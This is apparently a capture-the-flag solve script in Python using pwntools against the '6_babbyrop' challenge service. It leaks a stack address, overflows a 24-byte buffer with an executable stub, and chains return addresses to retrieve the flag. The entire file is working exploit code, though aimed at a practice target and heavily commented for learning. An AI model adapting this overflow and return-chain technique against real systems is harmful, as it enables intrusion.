- from pwn import *
# Addresses below are hard-coded for the 6_babbyrop binary, so the target is
# presumably built without PIE (confirm with checksec before reusing them on a
# different build).  Only dec_address is consumed by main(); the others look
# like leftovers from chain development.
dec_address = 0x401020   # second return target in main()'s chain
exit_address = 0x400e70  # unused by main()
pop_rdi = 0x401963       # unused by main(); presumably a `pop rdi; ret` gadget — TODO confirm
splift = 0x400f28        # unused by main(); name unclear (maybe a "split" gadget) — TODO confirm
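def main(host="exploitables.dcdark.net", port=31337):
    """Run the babbyrop exploit against the service and log the flag.

    What the visible chain does:
      1. The service prints the stack buffer's address as a hex line (an
         info leak this exploit depends on).
      2. We send a 24-byte region followed by two 8-byte return addresses.
      3. The first return address is the buffer itself, which holds a
         6-byte `mov edi, 0x41414141; ret` stub.  Returning into the buffer
         only works if that memory is executable, so NX is presumably off
         on this target -- inferred from the chain, not checked here.
      4. The stub's `ret` lands on dec_address with edi = 0x41414141.
      5. The next line from the service is treated as the flag if it
         contains "key".

    Args:
        host: remote host; defaults to the original hard-coded target.
        port: remote port.

    Returns:
        None.  Logs the flag on success and a failure message otherwise.
    """
    # For local debugging swap the next line for: p = process("./6_babbyrop")
    p = remote(host, port)
    try:
        # Leak: first line is the buffer address in hex.  int() accepts
        # bytes (py3) or str (py2) and tolerates the trailing newline.
        line = p.readline()
        try:
            address = int(line, 16)
        except ValueError:
            log.failure("Expected a hex buffer address, got %r" % (line,))
            return
        log.info("Got buffer address: 0x%x" % address)

        # Stage 1: the stub that runs from inside the buffer.  Bytes
        # literals keep this correct on py3, where a str would be
        # UTF-8-encoded on send and "\xbf" would become two bytes.
        stub = b"\xbf\x41\x41\x41\x41"  # mov edi, 0x41414141
        stub += b"\xc3"                 # ret

        # The saved return address sits 24 bytes into the buffer.  ljust()
        # silently leaves a longer string alone, which would shift the
        # return slot, so refuse to build an oversized stub.
        if len(stub) > 24:
            raise ValueError("stub is %d bytes, larger than the 24-byte buffer" % len(stub))
        ropchain = stub.ljust(24, b"A")
        ropchain += p64(address)      # ret -> buffer, executes the stub
        ropchain += p64(dec_address)  # stub's ret -> dec_address, edi already set

        p.send(ropchain)
        flag = p.readline().strip()
        if b"key" in flag:
            log.success("Flag: %s" % flag.decode("utf-8", "replace"))
        else:
            log.info("Exploit failed.")
    finally:
        # Always release the socket, even if the service hangs up early.
        p.close()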
# Entry point guard: importing this file (e.g. to reuse the addresses) runs
# nothing; only direct execution fires the exploit.
if __name__ == '__main__':
    main()